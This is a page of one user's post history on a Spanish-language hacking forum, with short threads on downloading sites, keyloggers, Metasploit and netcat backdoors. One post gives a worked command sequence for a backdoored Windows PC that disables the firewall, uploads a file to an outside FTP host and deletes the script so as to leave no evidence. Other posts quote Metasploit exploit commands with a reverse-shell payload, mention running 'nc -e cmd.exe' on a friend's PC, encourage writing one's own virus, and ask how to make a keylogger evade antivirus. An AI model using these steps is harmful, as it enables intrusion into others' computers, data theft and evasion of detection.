elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23
201  Seguridad Informática / Hacking / Re: DESCARGAR UNA WEB en: 21 Febrero 2015, 15:24 pm
Cordial saludo, gracias por leer mi tema, mi pregunta es la siguiente:

Soy estudiante de 3 semestre de ing de sistemas, y un día rondando me encontré esta página:

http://www.multitracks.com

y dentro esta web está la posibilidad de escuchar canciones pero con los tracks divididos, algo así:

http://www.multitracks.com/songs/New-Life-Worship/You-Hold-It-All/Great-I-Am/

Me gustó mucho la idea, deseo saber si es posible descargar, y realizar contraprogramación para saber como se hace eso.

Disculpen que de pronto no sea tan explícito, pero porfa ayúdenme. Gracias

Att.

Danandlema

El comando wget en linux, te permite descargar contenido de una web. Si pones wget y la web te descargas todos los ficheros de la web.
202  Seguridad Informática / Hacking / Re: keylogger en hdd portatil en: 21 Febrero 2015, 15:22 pm
Buenas es la primera vez que escribo, he estado mirando pero no veo nada, mi pregunta es hay posibilidad de meter un keylogger en un hdd portatil al que solo tendras accceso una vez y que te mande algun tipo de log cada cierto tiempo??


muchas gracias

¿Te suena la frase: "Cada maestrillo tiene su librillo"? Con esto quiero decir que hagas tus propias herramientas. No existe un virus publicado que sea 100% eficiente. Aprende lenguaje C o Python y crea tu propio virus. Ves poco a poco, es un consejo si no quieres perder el tiempo.
203  Seguridad Informática / Hacking / Re: No da como vulnerable vsftpd(metasploitable) escanenado con nmap nse en: 21 Febrero 2015, 12:09 pm
Hola.
  He bajado metasploitable 2 y al probar escanear la vulnerabilidad del servidor ftp con nmap no me la detecta. Esto es lo que me sale:
El caso es que he probado desde otro pc con backtrack y tampoco, así que no se donde está el error, aunque al no dar ninguna salida parece que el script no llega a ejecutarse o similar
Alguna orientación?

Salu2



¿Que versión es de vsftpd? Para saberlo ejecuta nmap -sV -p 21 (IP)
204  Seguridad Informática / Hacking / Re: ¿Como puedo hackear una PC con Metasploit? en: 21 Febrero 2015, 12:05 pm
Hola ultimamente e estado aprendiendo a hacer algunas cosas de Cracking pero ya me llama la atencion lo que seria siendo lo hacking, y decidi ir a aprender como hackear una PC vi unos tutoriales pero al final nada no funciono, les explico como lo hice, puse los siguientes comandos:
Cmd #1: use exploit/windows/smb/ms08_067_netapi
Cmd #2: set RHOST 000.000.000.000
Cmd #3: set payload windows/shell/reverse_tcp
Cmd #4: set LHOST 000.000.000.000
(Cmd #5): exploit

pero no me funciono, me sale unos errores pongo la ip y todo pero nada :s (Quiero dejar en claro que la pc que use para hackear es la de un amigo que es Linux/GNU) mi sistema operativo es Win 8.

Gracias por leer :D

 ;D ;D ;D ;D ;D ;D ;D ;D

Al principio siempre se esta confuso y perdido. Eres como yo xD
Vamos a ver... primero tienes que saber que un exploit es un programa creado para utilizar una vulnerabilidad. Cuando se descubre un exploit se le llama 0day, se le considera exploit cuando es publicado en internet. Lo normal es que cuando salga un exploit, antes de 48h ya se haya corregido. Estas siguiendo un tutorial que se esta realizando con una maquina virtual que presenta esa vulnerabilidad, que utilizará Windows XP. Un exploit de Windows XP ya no funcionará en Windows 7, y menos en Windows 8. Lo que tienes que hacer es, de momento, aprender a utilizar herramientas de escaneo de vulnerabilidades como Nmap, Nikto o Nessus, o Metasploit Community. No te fies 100% de los videos que ves.
Como ya te han dicho, el problema es que usas un exploit de 2008, que ya ha sido corregido xD.

Espero haberte ayudado.
205  Seguridad Informática / Hacking / Re: ¿Ayuda Backdoor? en: 21 Febrero 2015, 11:56 am
Si, ya abri los puertos y me puedo conectar perfectamente al backdoor que hice con netcat, lo que queria saber es como transferir archivos de una PC con backdoor a la mia, SIN activar el servidor ftp en la computadora con backdoor.
Gracias por Responder !!!
Es complicado no pasar ficheros por FTP ya que es el protocolo de transmisión de ficheros, además una backdoors como NC no se suele usar para transferir ficheros, sino para tener un control sobre el PC dominado. Si el problema es el firewall o algo, yo lo que hago si quiero enviarme algún fichero a un ordenador al que le he instalado la backdoor es:
C:\>echo (usuario)>> envioFTP.txt
C:\>echo (contraseña)>>envioFTP.txt
C:\>echo put (archivo que quieres enviar)>>envioFTP.txt
C:\>echo exit>>envioFTP.txt
C:\>netsh set firewall opmode disable (desactiva el firewall de windows)
C:\>ftp -s:envioFTP.txt (y aqui tu servidor FTP)
C:\>netsh set firewal opmode enable (activa el firewall de windows)
C:\>del envioFTP.txt (para no dejar evidencias)

Creo que con este ejemplo queda bastante claro como funciona. Aplico el ejemplo:

C:\>echo root>> envioFTP.txt
C:\>echo toor>>envioFTP.txt
C:\>echo put programa.exe>>envioFTP.txt
C:\>echo exit>>envioFTP.txt
C:\>netsh set firewall opmode disable
C:\>ftp -s:envioFTP.txt borja.es
C:\>netsh set firewal opmode enable
C:\> del envioFTP.txt

Espero haberte ayudado.
206  Seguridad Informática / Hacking / Re: Instalar una backdoor en: 21 Febrero 2015, 11:33 am
Depende del modem. Normalmente tienes acceso por web para poder abrirlos.
Hay veces que necesitas pedirle al ISP que los abra...
Problema solucionado, una shell reversa y listo. Gracias por ayudar.
207  Seguridad Informática / Hacking / Re: Me estan hackeando!!!! en: 21 Febrero 2015, 11:32 am
Formatea el ordenador. Si los antivirus no lo han detectado será dificil que lo encuentres. Yo lo formatearía.
208  Programación / Scripting / Ayuda con un chat en batch que utiliza nc en: 16 Febrero 2015, 20:26 pm
Hola, verán, el otro dia, sin querer, abrí netcat en el pc de un amigo conectandolo con el mio. Resulta que se me olvidó poner "-e cmd.exe" en la shell reversa y ví que podía acceder a un chat muy primitivo. El caso es... ¿Hay alguna manera de que cuando yo envie algo a él le aparezca de un color diferente al mio? y otra cosa ¿podría hacer que cada vez que yo inicie la shell reversa él recibiese un mensaje (como con el comando msg)?

Gracias
209  Programación / Programación C/C++ / Re: Hacer indetectable un keylogger en C en: 10 Febrero 2015, 15:31 pm
En mi opinion es actualmente imposible, que dure mas de un mes, mas que nada por la heurística esos programas estan muy quemados.
Pero como se podría hacer
210  Programación / Programación C/C++ / Hacer indetectable un keylogger en C en: 9 Febrero 2015, 22:01 pm
He hecho un keylogger pero el antivirus me lo detecta y según www.virustotal.com 20 más xD Me gustaría saber tecnicas para hacerlo indetectable.
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines